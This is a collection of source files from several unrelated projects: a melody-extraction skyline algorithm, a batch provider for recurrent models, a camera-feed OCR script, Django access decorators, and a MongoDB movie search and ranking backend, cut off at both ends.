# print("Avarage fmeasure scores: " + str(np.mean(fmeasure_list)))
return fmeasure_list, precision_list, recall_list
```
#### File: Symbolic-Melody-Identification/melody_extractor/skyline.py
```python
import numpy as np
from sklearn.model_selection import train_test_split
import sklearn.metrics
from data_handling import parse_data
import misc_tools
import settings
def skyline_pianorolls(input, onset=True):
"""
Perform the skyline algorithm on *pianoroll*. This just takes the
highest note at each time. If *onset* is True, then the original version is
used, in which the highest pitch referred to the most recent onset is
considered to be melody.
Reference paper:
<NAME> and <NAME>, "Melodic matching techniques for large
music databases," in Proceedings of the 7th ACM International Conference on
Multimedia '99, Orlando, FL, USA, October 30 - November 5, 1999, Part 1.,
1999, pp. 57-66.
RETURNS:
a new array of shape *pianoroll.shape* containing the resulting pianoroll
"""
pianoroll = np.array(input, dtype=misc_tools.floatX)
returned = np.zeros(pianoroll.shape, pianoroll.dtype)
for y, col in enumerate(pianoroll.T):
# iterating over columns
backup = False
for x, v in enumerate(col):
# iterating over pitches
if v != 0:
if onset:
if pianoroll[x, y - 1] == 0:
# new onset at highest pitch
returned[x, y] = v
backup = False
break
elif not backup:
# this is the highest value coming from a previous onset,
# store this value and add it after having parsed the whole
# column
backup = (x, y, v)
# N.B. now bool(backup) == True
else:
returned[x, y] = v
break
if backup:
# add the highest value coming from a previous onset
returned[backup[0], backup[1]] = backup[2]
backup = False
return returned
def test_skyline_pianorolls(PATH=settings.DATA_PATH):
import os
from data_handling import parse_data
# recurse all directories
dataset = []
for root, subdirs, files in os.walk(PATH):
# for each file with extension '.bz2'
for f in files:
if f[-3:] == ".bz":
new_file = os.path.join(root, f)
print("I've found a new file: " + new_file)
# load pianorolls score and melody
score, melody = parse_data.make_pianorolls(new_file)
dataset.append((score, melody))
train_set, test_set = train_test_split(
dataset, test_size=0.20, random_state=42)
overall_sk_tp = overall_sk_fp = overall_sk_tn = overall_sk_fn = 0
overall_hp_tp = overall_hp_fp = overall_hp_tn = overall_hp_fn = 0
avarage_pieces_sk = []
avarage_pieces_hp = []
for score, melody in test_set:
sk = skyline_pianorolls(score)
results = misc_tools.evaluate(sk, melody)
overall_sk_tp += results[0]
overall_sk_fp += results[1]
overall_sk_tn += results[2]
overall_sk_fn += results[3]
p = results[0] / misc_tools.EPS(results[0] + results[1])
r = results[0] / misc_tools.EPS(results[0] + results[3])
f = 2 * r * p / misc_tools.EPS(p + r)
avarage_pieces_sk.append((p, r, f))
hp = skyline_pianorolls(score, onset=False)
results = misc_tools.evaluate(hp, melody)
overall_hp_tp += results[0]
overall_hp_fp += results[1]
overall_hp_tn += results[2]
overall_hp_fn += results[3]
p = results[0] / misc_tools.EPS(results[0] + results[1])
r = results[0] / misc_tools.EPS(results[0] + results[3])
f = 2 * r * p / misc_tools.EPS(p + r)
avarage_pieces_hp.append((p, r, f))
# parse_data.plot_pianorolls(
# score, sk, out_fn=f + "_skyline.pdf")
# parse_data.plot_pianorolls(
# score, hp, out_fn=f + "_highestpitch.pdf")
print("Final Results Skyline:")
print("True positives: " + str(overall_sk_tp))
print("False positives: " + str(overall_sk_fp))
print("True negatives: " + str(overall_sk_tn))
print("False negatives: " + str(overall_sk_fn))
p = overall_sk_tp / misc_tools.EPS(overall_sk_tp + overall_sk_fp)
r = overall_sk_tp / misc_tools.EPS(overall_sk_tp + overall_sk_fn)
print("Precision: " + str(p))
print("Recall: " + str(r))
print("Fmeasures: " + str(2 * r * p / misc_tools.EPS(p + r)))
print("Avarage piece precision: " + str(np.mean(avarage_pieces_sk[0])))
print("Avarage piece recall: " + str(np.mean(avarage_pieces_sk[1])))
print("Avarage piece fmeasure: " + str(np.mean(avarage_pieces_sk[2])))
print()
print("Final Results Highest Pitch:")
print("True positives: " + str(overall_hp_tp))
print("False positives: " + str(overall_hp_fp))
print("True negatives: " + str(overall_hp_tn))
print("False negatives: " + str(overall_hp_fn))
p = overall_hp_tp / misc_tools.EPS(overall_hp_tp + overall_hp_fp)
r = overall_hp_tp / misc_tools.EPS(overall_hp_tp + overall_hp_fn)
print("Precision: " + str(p))
print("Recall: " + str(r))
print("Fmeasures: " + str(2 * r * p / misc_tools.EPS(p + r)))
print("Avarage piece precision: " + str(np.mean(avarage_pieces_hp[0])))
print("Avarage piece recall: " + str(np.mean(avarage_pieces_hp[1])))
print("Avarage piece fmeasure: " + str(np.mean(avarage_pieces_hp[2])))
def my_skyline_notelists(notelist):
"""
perform a variation a the skyline algorithm by taking always the highest pitch
at each time.
*notelist* must be in the form returned by misc_tools.load_files
RETURNS :
the list of predicted labels, where 1 is for melody note and 0 is for
accompaniment
"""
# ordering notelist by onset
notelist = sorted(notelist, key=lambda x: x[1])
predicted_label = [0 for n in range(len(notelist))]
previous_onset = 99999999999 # the first time is not a new onset
last_melody_offset = 0
highest_pitch = 0
melody_index = 0
last_melody_pitch = 0
for i, (pitch, onset, offset, ismelody) in enumerate(notelist):
if pitch > highest_pitch:
# look for the highest pitch among notes at this offset
highest_pitch = pitch
melody_index = i
elif onset > previous_onset:
# this is a new onset:
# test if among notes at the previous onset there is a melody note
if highest_pitch > last_melody_pitch or previous_onset >= last_melody_offset:
# mark the new melody note
predicted_label[melody_index] = 1
last_melody_offset = notelist[melody_index][2]
last_melody_pitch = notelist[melody_index][0]
highest_pitch = 0
previous_onset = onset
return predicted_label
def skyline_notelists(notelist):
"""
performs the skyline algorithm in its original formulation over
the *notelist* in input.
*notelist* is in the form returned by misc_tools.load_files
Reference paper:
<NAME> and <NAME>, "Melodic matching techniques for large
music databases," in Proceedings of the 7th ACM International Conference on
Multimedia '99, Orlando, FL, USA, October 30 - November 5, 1999, Part 1.,
1999, pp. 57-66.
RETURNS :
the list of predicted labels, where 1 is for melody note and 0 is for
accompaniment
"""
# ordering notelist by onset
notelist = sorted(notelist, key=lambda x: x[1])
predicted_label = [0 for n in range(len(notelist))]
previous_onset = 99999999999 # the first time is not a new onset
highest_pitch = 0
melody_index = 0
for i, (pitch, onset, offset, ismelody) in enumerate(notelist):
# take all notes at this onset
if onset > previous_onset:
# this is a new onset
predicted_label[melody_index] = 1
highest_pitch = pitch
melody_index = i
elif pitch > highest_pitch:
# chose the highest pitch
highest_pitch = pitch
melody_index = i
previous_onset = onset
return predicted_label
def test_skyline_notelists(PATH=settings.DATA_PATH, variation=False):
"""
This test the skyline algorithm on the whole dataset contained in *PATH*.
if *variation* is True, then *my_skyline_notelists* is used, otherwise
*skyline_notelists* is used.
"""
X, Y, map_sw, notelists = misc_tools.load_files(
PATH, 128, return_notelists=True)
del X, Y, map_sw
fmeasure_list = []
precision_list = []
recall_list = []
for i, notelist in enumerate(notelists):
if variation:
predicted_labels = my_skyline_notelists(notelist)
else:
predicted_labels = skyline_notelists(notelist)
true_labels = zip(*notelist)[-1]
precision = sklearn.metrics.precision_score(
true_labels, predicted_labels)
recall = sklearn.metrics.recall_score(true_labels, predicted_labels)
fmeasure = 2 * precision * recall / (precision + recall)
print("Piece number: " + str(i))
print("Precision: " + str(precision))
print("Recall: " + str(recall))
print("F1-measure: " + str(fmeasure))
print("")
fmeasure_list.append(fmeasure)
precision_list.append(precision)
recall_list.append(recall)
print("Average precision: " + str(np.mean(precision_list)))
print("Average recall: " + str(np.mean(recall_list)))
print("Average fmeasure: " + str(np.mean(fmeasure_list)))
if __name__ == '__main__':
# print("Testing with pianorolls...")
# print("__________________________")
# test_skyline_pianorolls()
DATA_PATH = settings.DATA_PATH
import sys
if len(sys.argv) > 1:
DATA_PATH = sys.argv[1]
print("Using data path: " + DATA_PATH)
print("Testing with notelists...")
print("__________________________")
test_skyline_notelists(PATH=DATA_PATH, variation=False)
# print("")
# print("And now the variation...")
# print("__________________________")
# test_skyline_notelists(variation=True)
```
#### File: Symbolic-Melody-Identification/nn_models/batch_provider.py
```python
import numpy as np
class RecurrentBatchProvider(object):
"""A class to load data from files and serve it in batches
for sequential models
"""
def __init__(self, dtype=np.float32):
self.data = []
self.sizes = []
self.dtype = dtype
def store_data(self, *args):
if not all([len(x) == len(args[0]) for x in args]):
raise Exception('The length of each array must be the same')
self.n_inputs = len(args)
dims = [None] * len(args)
for arrays in zip(*args):
for i, array in enumerate(arrays):
if not np.all(dims[i] == array.shape[1:]):
if dims[i] is None:
dims[i] = array.shape[1:]
else:
raise Exception(
'Cannot deal with variable output shapes')
self.data.append(arrays)
self.sizes.append(len(arrays[0]))
self.dims = dims
self._cs = np.r_[0, np.cumsum(self.sizes)]
def _make_batch_array(self, batch_size, segment_length, dim):
return np.empty([batch_size, segment_length] + list(dim), dtype=self.dtype)
def make_batch_arrays(self, batch_size, segment_length):
return [self._make_batch_array(batch_size, segment_length, dim)
for dim in self.dims]
def iter_pieces(self):
for arrays in self.data:
yield (array[np.newaxis, :].astype(self.dtype, copy=False)
for array in arrays)
def _get_batch(self, segment_producer, batch_size, segment_length,
batch_arrays=None):
if batch_arrays is None:
batch_arrays = self.make_batch_arrays(batch_size, segment_length)
else:
# Check that the number of given arrays is the same as the number of
# inputs
if len(batch_arrays) != self.n_inputs:
raise Exception(('Different number of arrays provided: {0} given '
'but {1} expected').format(len(batch_arrays),
self.n_inputs))
for i, (piece, segment_end) in enumerate(segment_producer(batch_size,
segment_length)):
arrays = self.data[piece]
start = segment_end - segment_length
start_trimmed = max(0, start)
for batch_a, array in zip(batch_arrays, arrays):
batch_a[i, - (segment_end - start_trimmed):] = array[
start_trimmed: segment_end]
if start < 0:
for batch_a in batch_arrays:
batch_a[i, :- (segment_end - start_trimmed)] = 0
return batch_arrays
def _select_segments_start(self, k, segment_size):
available_idx = np.array(self.sizes) - segment_size
valid = np.where(available_idx >= 0)[0]
try:
piece_idx = valid[np.random.randint(0, len(valid), k)]
except ValueError:
raise Exception(("No sequence is in the dataset is long enough "
"to extract segments of length {}")
.format(segment_size))
return np.column_stack(
(piece_idx, np.ones(k, dtype=np.int) * segment_size))
def _select_segments_end(self, k, segment_size):
sizes = np.array(self.sizes)
available_idx = sizes - segment_size
valid = np.where(available_idx >= 0)[0]
try:
piece_idx = valid[np.random.randint(0, len(valid), k)]
except ValueError:
raise Exception(("No sequence is in the dataset is long enough "
"to extract segments of length {}")
.format(segment_size))
return np.column_stack((piece_idx, sizes[piece_idx]))
def _select_segments_valid(self, k, segment_size):
available_idx = np.array(self.sizes) - segment_size + 1
valid = np.where(available_idx > 0)[0]
cum_idx = np.cumsum(available_idx[valid])
try:
segment_starts = np.random.randint(0, cum_idx[-1], k)
except ValueError:
raise Exception(("No sequence is in the dataset is long enough "
"to extract segments of length {}")
.format(segment_size))
piece_idx = np.searchsorted(cum_idx - 1, segment_starts, side='left')
index_within_piece = segment_starts - np.r_[0, cum_idx[:-1]][piece_idx]
return np.column_stack(
# (valid[piece_idx], index_within_piece))
(valid[piece_idx], index_within_piece + segment_size))
def _select_segments_full(self, k, segment_size):
total_instances = self._cs[-1]
segment_ends = np.random.randint(1, total_instances + 1, k)
piece_idx = np.searchsorted(self._cs[1:], segment_ends, side='left')
index_within_piece = segment_ends - self._cs[piece_idx]
return np.column_stack((piece_idx, index_within_piece))
def get_batch_full(self, batch_size, segment_length,
batch_arrays=None):
"""
Return a batch from the stored data. The segments in the batch may start
before the start of a data sequence. In this case, they are zero-padded
on the left, up to the start of the sequence.
Parameters
----------
batch_size : int
The number sequences to generate
segment_length : int
The desired length of the sequences
batch_arrays : list of ndarrays, optional
A list of arrays for storing the batch data in
Returns
-------
tuple
A tuple with ndarrays, containing the data for the batch
"""
return self._get_batch(self._select_segments_full, batch_size,
segment_length, batch_arrays)
def get_batch_valid(self, batch_size, segment_length,
batch_arrays=None):
"""
Return a batch from the stored data. Other than for `get_batch_full`, the
segments in the batch are always the subseqeuence of a data sequence. No
zero-padding will take place. Note that this implies that data from
sequences shorter than `segment_length` will never appear in the
returned batches.
Parameters
----------
batch_size : int
The number sequences to generate
segment_length : int
The desired length of the sequences
batch_arrays : list of ndarrays, optional
A list of arrays for storing the batch data in
Returns
-------
tuple
A tuple with ndarrays, containing the data for the batch
"""
return self._get_batch(self._select_segments_valid, batch_size,
segment_length, batch_arrays)
def get_batch_start(self, batch_size, segment_length,
batch_arrays=None):
"""
Return a batch from the stored data. This function returns only segments
starting at the beginning of a data sequence.
Parameters
----------
batch_size : int
The number sequences to generate
segment_length : int
The desired length of the sequences
batch_arrays : list of ndarrays, optional
A list of arrays for storing the batch data in
Returns
-------
tuple
A tuple with ndarrays, containing the data for the batch
"""
return self._get_batch(self._select_segments_start, batch_size,
segment_length, batch_arrays)
def get_batch_end(self, batch_size, segment_length,
batch_arrays=None):
"""
Return a batch from the stored data. This function returns only segments
ending at the end of a data sequence.
Parameters
----------
batch_size : int
The number sequences to generate
segment_length : int
The desired length of the sequences
batch_arrays : list of ndarrays, optional
A list of arrays for storing the batch data in
Returns
-------
tuple
A tuple with ndarrays, containing the data for the batch
"""
return self._get_batch(self._select_segments_end, batch_size,
segment_length, batch_arrays)
if __name__ == '__main__':
n_inputs = 2
n_outputs = 2
n_pieces = 3
n_features = 4
min_piece_len = 15
max_piece_len = 30
# create some data
piece_lens = np.random.randint(min_piece_len,
max_piece_len + 1,
n_pieces)
X = [np.column_stack((np.ones(n_instances) * i,
np.arange(n_instances))).astype(np.int)
for i, n_instances in enumerate(piece_lens)]
Y = [np.random.random((n_instances, n_outputs, n_features))
for n_instances in piece_lens]
# Y = X
bp = RecurrentBatchProvider()
bp.store_data(X, Y)
for x, y in bp.iter_pieces():
print x, y
``` |
{
"source": "2019pee0029/laddleApp",
"score": 2
} |
#### File: 2019pee0029/laddleApp/setup_cv1.py
```python
import sys
sys.path.append('D://laddleApp')
from recoModel.demo import *
from recoModel.model import RecoModel
import string
import torch
import torch.backends.cudnn as cudnn
import torch.utils.data
from recoModel.utils import CTCLabelConverter, AttnLabelConverter
from recoModel.dataset import RawDataset, AlignCollate
from detectModel.test import *
from PIL import Image
import cv2 as cv
import threading
from log import log, setupTimeRotatedLog
setupTimeRotatedLog("Laddle-Id-detection.log", log)
#recognizer model
opt = initializeParsers()
opt.FeatureExtraction = 'ResNet'
opt.SequenceModeling = 'BiLSTM'
opt.Prediction = 'Attn'
opt.test_image = 'street_name.jpg'
opt.image_folder = 'result'
opt.Transformation = 'TPS'
opt.saved_model = 'D:\\laddleApp\\recoModel\\weights\\TPS-ResNet-BiLSTM-Attn.pth'
# detector model
args = initializeDetectModelParsers()
args.trained_model = "D:\\laddleApp\\detectModel\\weights\\craft_mlt_25k.pth"
args.test_folder = "D:\\laddleApp\\detectModel\\test2\\"
net = LoadDetectionModel(args)
reco = LoadRecoModel(opt)
#res = Recognize(opt,reco)
log.info("loaded all models")
class VideoCamera(object):
def __init__(self):
self.video = cv.VideoCapture(
'rtsp://172.16.31.10/cam/realmonitor?channel=1&subtype=1&unicast=true&proto=Onvif') #172.24.136.242:554
#self.video = cv.VideoCapture('D:\\AI DS Projects\\rec_17_30.avi')
(self.grabbed, self.frame) = self.video.read()
threading.Thread(target=self.update, args=()).start()
def __del__(self):
self.video.release()
def get_frame(self):
ret, image = self.grabbed, self.frame
return ret,image
def update(self):
while True:
(self.grabbed, self.frame) = self.video.read()
def DetectTextArea(image):
"takes an image path and returns detected boxes"
preds = PredictDetection(args, net, image, opt,reco)
return preds
cam = VideoCamera()
ret, frame = cam.get_frame()
while(ret):
ret, frame = cam.get_frame()
preds,img = (DetectTextArea(frame))
cv.imshow('frame',img)
cv.moveWindow('frame', 200, 200)
if cv.waitKey(1) & 0xFF == ord('q'):
cv.destroyAllWindows()
break
``` |
{
"source": "2019somsom/som-django-new-",
"score": 2
} |
#### File: som-django-new-/users/decorators.py
```python
from django.conf import settings
from django.shortcuts import redirect
from django.contrib import messages
import sys, os
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from eggmorning.models import User
from django.http import HttpResponse
def login_message_required(function):
def wrap(request, *args, **kwargs):
if not request.user.is_authenticated:
messages.info(request, "로그인한 사용자만 이용할 수 있습니다.")
return redirect(settings.LOGIN_URL)
return function(request, *args, **kwargs)
return wrap
def admin_required(function):
def wrap(request, *args, **kwargs):
if request.user.level == '1' or request.user.level == '0':
return function(request, *args, **kwargs)
messages.info(request, "접근 권한이 없습니다.")
return redirect('/users/main/')
return wrap
def logout_message_required(function):
def wrap(request, *args, **kwargs):
if request.user.is_authenticated:
messages.info(request, "접속중인 사용자입니다.")
return redirect('/users/main/')
return function(request, *args, **kwargs)
return wrap
``` |
{
"source": "2019-Spring-Information-Retrieval/backend",
"score": 3
} |
#### File: aws_controller/advancedSearch/DatabaseDAO.py
```python
import queryWorker
import rankWorker
import pymongo
import bson.json_util
import pprint
class DatabaseDAO:
def __init__(self):
self.cacheDb = None
def connectToDatabase(self):
if self.cacheDb:
return self.cacheDb
client = pymongo.MongoClient("mongodb+srv://jack:<EMAIL>")
self.cacheDb = client['IMDBData']
return self.cacheDb
def advancedSearch(self, query: str):
q = queryWorker.QueryWorker()
words, index2docs = q.output(dao, query)
r = rankWorker.RankWorker(dao)
r.input(words, index2docs)
docs = r.output()
return docs
dao = DatabaseDAO()
# dao.connectToDatabase()
# print(dao.getOneMovie("Albela"))
# print(dao.getMovieFromTo(1,5))
# print(dao.getMovieFromTo("Drama",1,5))
# pprint.pprint(dao.getTopRated(10))
```
#### File: aws_controller/retrieveMovies/DatabaseDAO.py
```python
import pymongo
import bson.json_util
import pprint
from bson import ObjectId
class DatabaseDAO:
def __init__(self):
self.cacheDb = None
self.puncts = [',', '.', '"', ':', ')', '(', '-', '!', '?', '|', ';', "'", '$', '&', '/', '[', ']', '>', '%', '=', '#', '*', '+', '\\', '•', '~', '@', '£',
'·', '_', '{', '}', '©', '^', '®', '`', '<', '→', '°', '€', '™', '›', '♥', '←', '×', '§', '″', '′', 'Â', '█', '½', 'à', '…',
'“', '★', '”', '–', '●', 'â', '►', '−', '¢', '²', '¬', '░', '¶', '↑', '±', '¿', '▾', '═', '¦', '║', '―', '¥', '▓', '—', '‹', '─',
'▒', ':', '¼', '⊕', '▼', '▪', '†', '■', '’', '▀', '¨', '▄', '♫', '☆', 'é', '¯', '♦', '¤', '▲', 'è', '¸', '¾', 'Ã', '⋅', '‘', '∞',
'∙', ')', '↓', '、', '│', '(', '»', ',', '♪', '╩', '╚', '³', '・', '╦', '╣', '╔', '╗', '▬', '❤', 'ï', 'Ø', '¹', '≤', '‡', '√', ]
self.punct_mapping = {"‘": "'", "₹": "e", "´": "'", "°": "", "€": "e", "™": "tm", "√": " sqrt ", "×": "x", "²": "2",
"—": "-", "–": "-", "’": "'", "_": "-", "`": "'",
'“': '"', '”': '"', '“': '"', "£": "e", '∞': 'infinity', 'θ': 'theta', '÷': '/', 'α': 'alpha',
'•': '.', 'à': 'a', '−': '-', 'β': 'beta', '∅': '', '³': '3', 'π': 'pi', }
self.specials = {'\u200b': ' ', '…': ' ... ', '\ufeff': '', 'करना': '', 'है': ''}
def connectToDatabase(self):
if self.cacheDb:
return self.cacheDb
client = pymongo.MongoClient("mongodb+srv://jack:<EMAIL>")
self.cacheDb = client['IMDBData']
return self.cacheDb
def replace_punct(self, x):
x = str(x)
for p in self.punct_mapping:
x = x.replace(p, self.punct_mapping[p])
for punct in self.puncts:
x = x.replace(punct, '')#f' {punct} ')
for s in self.specials:
x = x.replace(s, self.specials[s])
return x.lower().split()
def getOneMovie(self, title):
return self.cacheDb['Movies'].find_one({"Title": title})
def getManyMovies(self, query, number):
text = '^'
for word in self.replace_punct(query):
text = text + word + "[ : -]*"
# if self.cacheDb['Movies'].count_documents({'Title': {"$regex": '^' + query , '$options':'i'}}) < int(number):
# return bson.json_util.dumps(self.cacheDb['Movies'].find({'Title': {"$regex": '^' + query, '$options':'i' }}))
# return bson.json_util.dumps(self.cacheDb['Movies'].find({'Title': {"$regex": '^' + query, '$options':'i'}}).limit(int(number)))
return bson.json_util.dumps(
self.cacheDb['Movies'].find({'Title': {"$regex": text, '$options': 'i'}}).limit(int(number)))
def countAll(self, genre):
return self.cacheDb['Movies'].count_documents({'Genre': {"$regex": ".*" + genre + ".*"}})
def getMovieFromTo(self, genre, start, end):
return bson.json_util.dumps(self.cacheDb['Movies'].find({'Genre': {"$regex": ".*" + genre + ".*"}}).skip(int(start)).limit(int(end)))
def getTopRated(self, num, minVote):
return bson.json_util.dumps(self.cacheDb['Movies'].find({"imdbRating": {"$lt": 10.1}, "imdbVotes": {"$gt": int(minVote)}}).sort([("imdbRating", -1), ("imdbVotes", -1)]).limit(int(num)))
dao = DatabaseDAO()
dao.connectToDatabase()
print(dao.replace_punct("Captain America: Civil "))
pprint.pprint(dao.getManyMovies("Captain America: C ", 100))
# pprint.pprint(dao.getWatchlist("<EMAIL>",1,1))
# dao.convert()
# pprint.pprint(bson.json_util.dumps(dao.check()))
# print(dao.getOneMovie("How to Train Your Dragon"))
# print(dao.getMovieFromTo(1,5))
# pprint.pprint(dao.getMovieFromTo("Drama",1,5))
# pprint.pprint(dao.getTopRated(10, 2000))
## First convert
# 5c97f29812c54d2e52ab3a08
# Hanging Perverts
# 64960
## Second convert
# 5c97fac912c54d2e52ab800c
# A Painting Lesson
# ------------
# 5c97fac912c54d2e52ab7f29
# Gearheads
# ------------
# 5c97fac912c54d2e52ab7f2d
# Inkaar
# ------------
# 5c97fac912c54d2e52ab7f37
# On the Verge
# ------------
# 5c97fac912c54d2e52ab7f91
# The City of Children
# ------------
#82673
## Third convert
# ------------
# 114018
# 5c982a3b12c54d2e52ad5940
# Kaos
# ------------
# 114019
# 5c982a3b12c54d2e52ad59ec
# Deadly Match
# ------------
# 114020
# 5c982a3b12c54d2e52ad585f
# Devadas
# ------------
# 114021
# 5c982a3b12c54d2e52ad597a
# Tropykaos
# ------------
#
#
# def convert(self):
# doc = self.cacheDb['Movies'].find().limit(64960)
# count = 1
# countError = 0
# for item in doc:
# try:
# item['imdbRating']
# except KeyError:
# countError = countError + 1
# continue
#
# if (item['imdbRating'] == "N/A"):
# countError = countError + 1
# continue
#
# try:
# vote = item["imdbVotes"].replace(",", "")
# except:
# countError = countError + 1
# continue
# if (item['imdbVotes'] == "N/A"):
# countError = countError + 1
# continue
#
# print(count)
# count = count + 1
# print((item['_id']))
# print((item['Title']))
# print("------------")
# self.cacheDb['Movies'].update_one({"_id": item["_id"]},
# {"$set":
# {"imdbRating": float(item['imdbRating']),
# "imdbVotes": int(vote)}},
# upsert=False)
#
#
# def check(self):
# return self.cacheDb['Movies'].find({"_id": ObjectId("5c97cf1112c54d2abe3dca49")})
# # return self.cacheDb['Movies'].find({"_id": { "$lt" : ObjectId("5c97fac912c54d2e52ab7f37")}}).count()
```
#### File: aws_controller/SetUpNewUser/lambda_function.py
```python
import json
from DatabaseDAO import DatabaseDAO, dao
from JSONEncoder import JSONEncoder
count = -1
def lambda_handler(event, context):
"""Sample pure Lambda function
Parameters
----------
event: dict, required
API Gateway Lambda Proxy Input Format
Event doc: https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-lambda-proxy-integrations.html#api-gateway-simple-proxy-for-lambda-input-format
context: object, required
Lambda Context runtime methods and attributes
Context doc: https://docs.aws.amazon.com/lambda/latest/dg/python-context-object.html
Returns
------
API Gateway Lambda Proxy Output Format: dict
Return doc: https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-lambda-proxy-integrations.html
"""
# try:
# ip = requests.get("http://checkip.amazonaws.com/")
# except requests.RequestException as e:
# # Send some context about this error to Lambda Logs
# print(e)
# raise e
# context["callbackWaitsForEmptyEventLoop"] = "false"
global dao
global count
count = count + 1
user = {}
user["email"] = event["request"]["userAttributes"]["email"]
user["nickname"] = event["request"]["userAttributes"]["nickname"]
dao.connectToDatabase()
dao.insertUser(user)
return event
```
#### File: 2019-Spring-Information-Retrieval/backend/rankWorker.py
```python
from typing import List, Dict
from sklearn.feature_extraction.text import TfidfTransformer
import numpy as np
from collections import defaultdict
from functools import reduce
from pymongo import MongoClient
np.set_printoptions(precision=5)
def getFinalScore(scores: List[float], names: List[str]=None):
weights = {'freq-plot': 0.79, 'freq-script': 0.63,
'freq-title': 0.88, 'post-script': 0.63, 'post-plot': 0.51}
cur_weight = [weights[n] for n in names]
new_weight = [w / sum(cur_weight) for w in cur_weight]
results = 0
for ix, score in enumerate(scores):
results += new_weight[ix] * score
return results
class RankWorker(object):
"""docstring for RankWorker
"""
def __init__(self):
self.index2docs = {} # indextype : {word:{docid:freq}}
self.doc2vecs = {} # indextype : {doc: feature matrix}
self.docs2score = {}
self.ix_to_doc = {}
self.doc_to_ix = {}
self.word_to_ix = {}
self.qwords = []
self.index_ids = None
self.limit_docs = None
def input(self, qwords: List, index2docs: Dict, limit: int=None):
"""
"""
# print(index2docs)
self.index2docs = index2docs
self.qwords = qwords
self.index_ids = list(index2docs.keys())
if limit is not None:
self.limit_docs = limit
def precheck(self)->bool:
"""
whether the index2docs is larger than 0
"""
flag = True
self.word2index()
self.docs2index()
if len(self.index2docs) <= 0:
flag = False
elif len(self.qwords) == 0:
flag = False
elif max([len(self.index2docs[idx]) for idx in self.index_ids]) == 0:
flag = False
elif len(self.word_to_ix) == 0:
flag = False
elif len(self.doc_to_ix) == 0:
flag = False
return flag
def word2index(self):
for w in self.qwords:
if w not in self.word_to_ix:
self.word_to_ix[w] = len(self.word_to_ix)
def docs2index(self):
"""
"""
# 统计所有出现过的文档
for idx in self.index_ids:
for wd in self.word_to_ix.keys(): # for every query word
if wd not in self.index2docs[idx]:
continue
for d in self.index2docs[idx][wd].keys(): # for every doc id
if d not in self.doc_to_ix:
self.doc_to_ix[d] = len(self.doc_to_ix)
# 反向索引
self.ix_to_doc = {ix: doc for doc, ix in self.doc_to_ix.items()}
def docs2feature(self, index: str):
"""
"""
# 建立倒排索引下的 文档-词汇频率 矩阵
doc2wordfreq = [[0] * len(self.word_to_ix)
for _ in range(len(self.doc_to_ix))]
for wd, docDict in self.index2docs[index].items():
for did, freq in docDict.items():
x = self.doc_to_ix[did]
y = self.word_to_ix[wd]
doc2wordfreq[x][y] = freq
self.doc2vecs[index] = doc2wordfreq
def docs2position(self, index: str):
# 出现位置初始化为-1,当真有出现的时候,会直接覆盖出现位置的list
word_doc_post = [[[-1] for __ in range(
len(self.doc_to_ix))] for ___ in range(len(self.word_to_ix))]
for wd in self.word_to_ix.keys():
for doc in self.doc_to_ix.keys():
if wd not in self.index2docs[index]:
continue
if doc not in self.index2docs[index][wd]:
continue
word_doc_post[self.word_to_ix[wd]][self.doc_to_ix[
doc]] = self.index2docs[index][wd][doc]
self.doc2vecs[index] = word_doc_post
def alignment(self, word_doc_post)->Dict:
# N = len(self.word_to_ix) # word
# M = len(self.doc_to_ix) # doc
def comb(place1, place2, coda=' '):
return [str(p1) + coda + str(p2) for p1 in place1 for p2 in place2]
# 算分 这里是 直接算距离的方法
docs_score = [0] * len(self.doc_to_ix) # {}
baseline = np.array([i + 1 for i in range(len(self.qwords))]) # 1 by N
for doc in self.doc_to_ix.keys():
j = self.doc_to_ix[doc]
places = [word_doc_post[self.word_to_ix[w]][j]
for w in self.qwords]
vectors = reduce(comb, places) # length = H
comb_to_plcs = np.array([list(map(int, vec.split()))
for vec in vectors]) # H by N
scores = np.dot(baseline, comb_to_plcs.T) # 1 by H
docs_score[j] = np.max(scores) # softmax(scores)) # 1
mean = sum(docs_score) / len(self.doc_to_ix)
diff = max(docs_score) - min(docs_score)
docs_to_score = {doc: (
docs_score[self.doc_to_ix[doc]] - mean + 1) / (diff + 1) for doc in self.doc_to_ix.keys()}
return docs_to_score
def freqRanking(self, index: str):
self.docs2feature(index)
freqs = [0 for _ in range(len(self.doc_to_ix))]
for ix, vals in enumerate(self.doc2vecs[index]):
freqs[ix] = sum(vals) / len(vals)
mean = sum(freqs) / len(freqs)
diff = max(freqs) - min(freqs)
scores = [(f - mean + 1) / (diff + 1) for f in freqs]
for ix, s in enumerate(scores):
self.docs2score[self.ix_to_doc[ix]].append(s)
def invertRanking(self, index: str):
self.docs2feature(index)
tfidf = TfidfTransformer()
tfidfmat = tfidf.fit_transform(self.doc2vecs[index])
for ix, vec in enumerate(tfidfmat.toarray()):
if np.square(vec).sum() != 0:
score = np.sum(vec) / np.square(vec).sum()
else:
score = 0
self.docs2score[self.ix_to_doc[ix]].append(score)
def positionRanking(self, index: str):
self.docs2position(index)
docs_score = self.alignment(self.doc2vecs[index])
for did in self.doc_to_ix:
self.docs2score[did].append(docs_score[did])
def ranking(self)->List:
""" The core of this class!
0. 将检索结果转化成特征向量
1. 计算不同特征的得分
2. 计算加权和
3. 排序
"""
# 文档-分数 字典
self.docs2score = defaultdict(list)
index_names = []
if len(self.qwords) > 1:
if 'freq-plot' in self.index_ids:
self.invertRanking('freq-plot')
index_names.append('freq-plot')
if 'freq-script' in self.index_ids:
self.invertRanking('freq-script')
index_names.append('freq-script')
if 'post-plot' in self.index_ids:
self.positionRanking('post-plot')
index_names.append('post-plot')
if 'post-plot' in self.index_ids:
self.positionRanking('post-script')
index_names.append('post-script')
else:
if 'freq-plot' in self.index_ids:
self.freqRanking('freq-plot')
index_names.append('freq-plot')
if 'freq-script' in self.index_ids:
self.freqRanking('freq-script')
index_names.append('freq-script')
# 2. 合计总分
scoring = []
ranking = []
for doc, scores in self.docs2score.items():
ranking.append(doc)
scoring.append(getFinalScore(scores, index_names))
# 3. 根据总分排序
inds = np.argsort(scoring)
ranking = np.array(ranking)
ranking = ranking[inds]
return ranking[::-1]
def getDocs(self, docIDs: List)->List:
"""
get the original docs from database
docsIDs: the docs id that need to obtain from database
"""
# 是否限制最大检索数量
nums = len(docIDs)
if self.limit_docs is not None and nums > self.limit_docs:
nums = self.limit_docs
LOCAL_URL = "mongodb+srv://jack:<EMAIL>"
mc = MongoClient(LOCAL_URL)
db = mc['IMDBData']
c = db['Movies']
